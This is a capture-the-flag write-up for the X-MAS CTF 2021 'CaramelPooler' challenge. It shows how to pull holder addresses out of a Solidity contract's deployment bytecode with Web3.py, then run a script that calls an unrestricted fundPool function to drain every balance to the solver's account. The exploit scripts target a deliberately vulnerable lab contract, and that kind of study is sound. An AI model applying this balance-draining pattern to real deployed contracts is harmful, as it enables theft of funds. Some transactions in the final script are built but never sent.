Tower of Hanoi

X-MAS CTF - CaramelPooler

by on under XMASCTF2021
8 minute read ·

Challenge: CaramelPooler

Description:

Tokugawa shogunate cheated for a living. For that reason, you have to become shogun instead. Do it for Hideyoshi!
nc challs.xmas.htsp.ro 8016
http://challs.xmas.htsp.ro:8017/
Source

Analizing Given Files:

At first we need to understand what the provided contracts make:

  • Setup.sol creates a new caramelPool contract passing it 10 ethereum addresses and also contain a isSolved() function that checks if a variable in CaramelPool is different from an address. Setup.isSolved() returning a True value means we solve the challenge.
  • CaramelPool.sol creates a certain number of tokens (total supply equal to 180000000) divided equally between ten addresses (the ten address provided during Setup.sol creation). The contract permits to tranfer those tokens between addresses (with the function CaramelPool.transfer(fromAddress, toAddress)), to fund the pool and then withdraw (with the functions CaramelPool.fundPool(fromAddress) and CaramelPool.withdrawFromPool()). There’s also a function to check the token balance of an address (CaramelPool.balanceOf(address)) and the becomeCaramelShogun() function, which checks if the balance of an address is equal to the total supply and, if so, turns that address into the Shogun. If the sender address is the Shogun, Setup.isSolved() returns true and the callenge is solved.
    Even if it is not of useful to the solution, the CaramelPool.sol also contains the private function isContract(address) which checks if an address is a contract for duration. Just for more information, the method by which it is checked whether an address is a contract or no, is easily bypassable with this solution.

To obtain these contracts and the blockchain used for the challenge, it is necessary to: nc challs.xmas.htsp.ro 8016. With this command it is possible, after selecting launch new instance and solving a short pow with hashcash, to obtain: an RPC endpoint, the address of the Setup.sol contract, a private key and a uuid (useful for obtaining the flag at the end of the challenge).

Strategy

As you can understand from the analysis of the two contracts, all we have to do is transfer the tokens from the 10 addresses declared in Setup.sol to the sender address with the function CaramelPool.fundPool() and CaramelPool.withdrawFromPool().
The problem lies in finding these 10 addresses.
All data on the blockchain, due to its use as a publicly distributed ledger, is public and therefore visible to anyone.
To retrieve all the data used by a particular contract when it was created and deployed, it is necessary to find the block and the transaction that generated it. From the input of the transaction it is possible to find out (in the form of bytecode) the data of the contract.

Retrieving the transaction data

Fortunately for every blockchain instance of the challenge, the last block is the one in which the contracts were created. To retreive the transaction data in this contract is possible to create a python script using the Web3.py Python library.
This library allows to interact with the Ethereum (and similar) blockchain. Here’s a quick reference about how to install and use it.
The python script must:

  1. connect with the given RPC endpoint
  2. ask a node for the last block (which only contains the transaction of the generation of the challenge contracts)
  3. access the transaction present in the last block
  4. print the input of the transaction

Here’s the code:

from web3 import Web3

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))

blockNumber = provider.eth.block_number 
lastBlock = provider.eth.get_block(blockNumber)
lastTransaction = provider.eth.get_transaction(str(((lastBlock.transactions)[0]).hex()))
print("Last transaction input: ", lastTransaction.input)

The code output is the following bytecode:

0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b509050730136439830e1abe0296b764691eb3fc296d145bf816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073122e53f0444ac267371a0cf63d15cd782d8bb1c68160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f219ab540356cbb839cbe05303d7705fa816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050734452552736041bcc3fe0f35647e56f2c4fdf956e8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507201e0515bc0b5c2df1abc2842b42b29994f44d0816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507397eebf4908c5c08eb09196579fc6451585d1b9a68160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050731352cb6ccec784dd765ac55f0413cadfa4946cfd81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507314db6558f0dfcd940dae566c20f694d2f0454ca88160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507313182312eed5a75d62e45b726b63639b6a8f25bc81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050731337cee91653179667c33affdbc28264c50c40b0816009815181106105a0577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050806040516105e790610653565b6105f191906106e5565b604051809103906000f08015801561060d573d6000803e3d6000fd5b506000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610772565b610f6c80610a3283390190565b600061066c8383610678565b60208301905092915050565b61068181610740565b82525050565b600061069282610717565b61069c818561072f565b93506106a783610707565b8060005b838110156106d85781516106bf8882610660565b97506106ca83610722565b9250506001810190506106ab565b5085935050505092915050565b600060208201905081810360008301526106ff8184610687565b905092915050565b6000819050602082019050919050565b600081519050919050565b6000602082019050919050565b600082825260208201905092915050565b600061074b82610752565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6102b1806107816000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c806364d98f6e1461003b578063dd62930314610059575b600080fd5b610043610077565b60405161005091906101cc565b60405180910390f35b61006161014c565b60405161006e91906101e7565b60405180910390f35b6000601373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16634deb82256040518163ffffffff1660e01b815260040160206040518083038186803b1580156100f757600080fd5b505afa15801561010b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061012f9190610185565b73ffffffffffffffffffffffffffffffffffffffff161415905090565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008151905061017f81610264565b92915050565b60006020828403121561019757600080fd5b60006101a584828501610170565b91505092915050565b6101b781610214565b82525050565b6101c681610240565b82525050565b60006020820190506101e160008301846101ae565b92915050565b60006020820190506101fc60008301846101bd565b92915050565b600061020d82610220565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061024b82610252565b9050919050565b600061025d82610220565b9050919050565b61026d81610202565b811461027857600080fd5b5056fea264697066735822122032de8043eb101f00939d6e6153b5efe66761756956858822513c652ab115209464736f6c63430008000033608060405260006001556012600260006101000a81548160ff021916908360ff160217905550600260009054906101000a900460ff1660ff16600a62000046919062000314565b620f424062000056919062000314565b6003556013600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000a857600080fd5b5060405162000f6c38038062000f6c8339818101604052810190620000ce91906200026c565b60005b8151811015620001ab576000600260009054906101000a900460ff1660ff16600a620000fe919062000314565b620186a06200010e919062000314565b9050806000808585815181106200014e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550508080620001a290620003b3565b915050620000d1565b505062000479565b6000620001ca620001c484620002e5565b620002b1565b90508083825260208201905082856020860282011115620001ea57600080fd5b60005b858110156200021e578162000203888262000228565b845260208401935060208301925050600181019050620001ed565b5050509392505050565b60008151905062000239816200045f565b92915050565b600082601f8301126200025157600080fd5b815162000263848260208601620001b3565b91505092915050565b6000602082840312156200027f57600080fd5b600082015167ffffffffffffffff8111156200029a57600080fd5b620002a8848285016200023f565b91505092915050565b6000604051905081810181811067ffffffffffffffff82111715620002db57620002da62000430565b5b8060405250919050565b600067ffffffffffffffff82111562000303576200030262000430565b5b602082029050602081019050919050565b60006200032182620003a9565b91506200032e83620003a9565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200036a576200036962000401565b5b828202905092915050565b6000620003828262000389565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000620003c082620003a9565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415620003f657620003f562000401565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200046a8162000375565b81146200047657600080fd5b50565b610ae380620004896000396000f3fe608060405234801561001057600080fd5b50600436106100935760003560e01c80634deb8225116100665780634deb8225146100fa578063534844a2146101185780635b8ff0cf1461013657806370a0823114610140578063ba45b0b81461017057610093565b806318160ddd1461009857806326c0e5c5146100b6578063313ce567146100c05780633d61e543146100de575b600080fd5b6100a061018c565b6040516100ad9190610981565b60405180910390f35b6100be610192565b005b6100c8610271565b6040516100d5919061099c565b60405180910390f35b6100f860048036038101906100f3919061066e565b610284565b005b610102610371565b60405161010f91906108a6565b60405180910390f35b610120610397565b60405161012d9190610981565b60405180910390f35b61013e61039d565b005b61015a6004803603810190610155919061066e565b610463565b6040516101679190610981565b60405180910390f35b61018a60048036038101906101859190610697565b61047b565b005b60035481565b61019b33610646565b156101db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101d290610921565b60405180910390fd5b6003546001541115610222576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161021990610961565b60405180910390fd5b6001546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000600181905550565b600260009054906101000a900460ff1681565b61028d33610646565b156102cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016102c490610901565b60405180910390fd5b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806001600082825461036691906109c8565b925050819055505050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015481565b6003546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610420576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610417906108c1565b60405180910390fd5b33600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006020528060005260406000206000915090505481565b8073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614156104ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104e190610941565b60405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610558576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054f906108e1565b60405180910390fd5b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050600081116105a857600080fd5b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461063a91906109c8565b92505081905550505050565b600080823b905060008111915050919050565b60008135905061066881610a96565b92915050565b60006020828403121561068057600080fd5b600061068e84828501610659565b91505092915050565b600080604083850312156106aa57600080fd5b60006106b885828601610659565b92505060206106c985828601610659565b9150509250929050565b6106dc81610a1e565b82525050565b60006106ef6039836109b7565b91507f596f7520646f6e2774206861766520656e6f75676820746f6b656e7320746f2060008301527f6265636f6d652074686520436172616d656c2053686f67756e000000000000006020830152604082019050919050565b6000610755601c836109b7565b91507f43616e206f6e6c792073656e642066726f6d20796f757273656c6621000000006000830152602082019050919050565b60006107956015836109b7565b91507f4e6f20636f6e74726163747a20616c6c6f7765642e00000000000000000000006000830152602082019050919050565b60006107d56020836109b7565b91507f596f752063616e27742077697468647261772066726f6d2074686520706f6f6c6000830152602082019050919050565b60006108156018836109b7565b91507f43616e6e6f742073656e6420746f20796f757273656c662100000000000000006000830152602082019050919050565b6000610855601a836109b7565b91507f446f6e27742074727920746f206861636b2074686520706f6f6c0000000000006000830152602082019050919050565b61089181610a50565b82525050565b6108a081610a5a565b82525050565b60006020820190506108bb60008301846106d3565b92915050565b600060208201905081810360008301526108da816106e2565b9050919050565b600060208201905081810360008301526108fa81610748565b9050919050565b6000602082019050818103600083015261091a81610788565b9050919050565b6000602082019050818103600083015261093a816107c8565b9050919050565b6000602082019050818103600083015261095a81610808565b9050919050565b6000602082019050818103600083015261097a81610848565b9050919050565b60006020820190506109966000830184610888565b92915050565b60006020820190506109b16000830184610897565b92915050565b600082825260208201905092915050565b60006109d382610a50565b91506109de83610a50565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115610a1357610a12610a67565b5b828201905092915050565b6000610a2982610a30565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b610a9f81610a1e565b8114610aaa57600080fd5b5056fea264697066735822122074a092343e8d285c00cad1183aac813d54f28f902c2db35ed148fe5b7d4d119364736f6c63430008000033

Analyze Bytecode

To retrieve the 10 addresses used by the setup.sol contract all we need to do is analyze the bytecode. For the analysis process we can get help from some tools like the pyevmasm library, with the useful evmasm command that permits to assemble or disassemble the Ethereum Virtual Machine bytecode.
The addresses with the token are some of the correct addresses subject to a push operation (if an address is subject to a push 16 or 20 it should be padded with zeros). This work could also be done with some online disassembler like this or more simply by noting that the bytecode has a repetitive pattern that isolates the 10 desired addresses:

0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b50905073
 ->   0136439830e1abe0296b764691eb3fc296d145bf
816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   122e53f0444ac267371a0cf63d15cd782d8bb1c6
8160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f
 ->   219ab540356cbb839cbe05303d7705fa 	#Address to be padded with zeros
816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   4452552736041bcc3fe0f35647e56f2c4fdf956e 
8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505072
 ->   01e0515bc0b5c2df1abc2842b42b29994f44d0 	#Address to be padded with zeros
816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   97eebf4908c5c08eb09196579fc6451585d1b9a6
8160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   1352cb6ccec784dd765ac55f0413cadfa4946cfd
81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   14db6558f0dfcd940dae566c20f694d2f0454ca8
8160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   13182312eed5a75d62e45b726b63639b6a8f25bc
81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   1337cee91653179667c33affdbc28264c50c40b0
816009815181106105a0577f4e487b710000000000000000000000000000000000000000000000000000000060005260...

So the ten addresses are:

  1. 0x0136439830e1abe0296b764691eb3fc296d145bf
  2. 0x122e53f0444ac267371a0cf63d15cd782d8bb1c6
  3. 0x00000000219ab540356cbb839cbe05303d7705fa
  4. 0x4452552736041bcc3fe0f35647e56f2c4fdf956e
  5. 0x0001e0515bc0b5c2df1abc2842b42b29994f44d0
  6. 0x97eebf4908c5c08eb09196579fc6451585d1b9a6
  7. 0x1352cb6ccec784dd765ac55f0413cadfa4946cfd
  8. 0x14db6558f0dfcd940dae566c20f694d2f0454ca8
  9. 0x13182312eed5a75d62e45b726b63639b6a8f25bc
  10. 0x1337cee91653179667c33affdbc28264c50c40b0

Interacting with the contract and becoming Shōgun

After finding the ten addresses containing the desired tokens, it is necessary to interact with the CaramelPool.sol contract and arriving at a balance equal to the total token supply. To interact with the blockchain we could both use the Web3.py python library or a web-based Solidity online IDE, Remix.
With Remix IDE at first we have to upload the two contracts given in the File Explorers tab and compile them with the correct version of Solidity (in this case the 0.8.0) in the Solidity Compiler tab.
Then we load the contracts in the Deploy & Run Transactions tab by connecting to the rpc endpoint given (switch the Environment to Web3 Provider giving the rpc endpoint link) and pasting the setup address in the Load contract from Address field.
After this by clicking the At Address button we load the Setup.sol and then by calling the Setup.carmelPool() function (clicking the caramelPool button in the Deployed Contracts section) we can get the CaramelPool.sol address.
After loading CaramelPool.sol contract and calling the CaramelPool.fundPool(fromAddress) function with the ten address found as a parameter we can have a withdram amount in the contract pool equal to the total supply. Then by calling the CaramelPool.withdrawFromPool() function and CaramelPool.becomeCaramelShogun() we can become the Shogun so if we call the Setup.isSolved() function we get a true value.

With Web3.py Python library. All we have to do is to know a private key account, the rpc endpoint link, the Setup.sol contract address and the ABI of the two contracts.

from web3 import Web3
import json

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))
privateKey = 'INSERT_HERE_THE_PRIVATE_KEY_GIVEN'
nonce = 0

with open("setup.json") as f:       #json file with the contract ABI
    setup_json = json.load(f)
with open("caramel.json") as f:     #json file with the contract ABI
    caramel_json = json.load(f)

setupContract = Web3.toChecksumAddress('INSERT_HERE_THE_SETUP_CONTRACT_ADDRESS_GIVEN')
setup = provider.eth.contract(address=setupContract, abi = setup_json)
caramelContract = Web3.toChecksumAddress(setup.functions.caramelPool().call())
caramel = provider.eth.contract(address=caramelContract, abi = caramel_json)

addressesToken = [ '0x0136439830e1abe0296b764691eb3fc296d145bf', 
                    '0x122e53f0444ac267371a0cf63d15cd782d8bb1c6',
                    '0x00000000219ab540356cbb839cbe05303d7705fa',
                    '0x4452552736041bcc3fe0f35647e56f2c4fdf956e',
                    '0x0001e0515bc0b5c2df1abc2842b42b29994f44d0',
                    '0x97eebf4908c5c08eb09196579fc6451585d1b9a6',
                    '0x1352cb6ccec784dd765ac55f0413cadfa4946cfd',
                    '0x14db6558f0dfcd940dae566c20f694d2f0454ca8',
                    '0x13182312eed5a75d62e45b726b63639b6a8f25bc',
                    '0x1337cee91653179667c33affdbc28264c50c40b0']

for addressTarget in addressesToken:
    transaction = caramel.functions.fundPool(Web3.toChecksumAddress(addressTarget)).buildTransaction({
        'gas': 70000,
        'gasPrice': Web3.toWei(40, 'gwei'), 
        'nonce': nonce})
    signed_txn = provider.eth.account.signTransaction(transaction, private_key=privateKey)
    provider.eth.sendRawTransaction(signed_txn.rawTransaction)
    nonce += 1

transaction = caramel.functions.withdrawFromPool().buildTransaction({
    'gas': 70000,
    'gasPrice': Web3.toWei(40, 'gwei'), 
    'nonce': nonce
})      #Withdraw all the token to the sender address
nonce += 1
transaction = caramel.functions.becomeCaramelShogun().buildTransaction({
    'gas': 70000,
    'gasPrice': Web3.toWei(40, 'gwei'), 
    'nonce': nonce
})      #Now the sender address is the caramel Shogun 

print(setup.functions.isSolved().call())

Retrieving the flag

After the Setup.isSolved() function returned a True value we can get the flag by connect to the challenge server with nc challs.xmas.htsp.ro 8016, selecting get flag and inserting the uuid given at the beginning of the challenge.

Turns out that the flag was: X-MAS{G00d_j0b_y0u_4r3_Hideyoshis_h31r}
X-MAS CTF, Solidity, Ethereum, Blockchain, Blockchain Data Scraping, Smart Contract
comments powered by Disqus
Read More
Reply Cyber Security Challenge 2022
On October 14th and 15th 2022 we participated in the Reply Cyber Security Challenge 2022. We solved many challenges and overall placed second (CTFtime). These are the writeups of the... Continue Reading
Theme 'Carte Noire' by Jacob Tomlinson
Customized by the Tower of Hanoi team.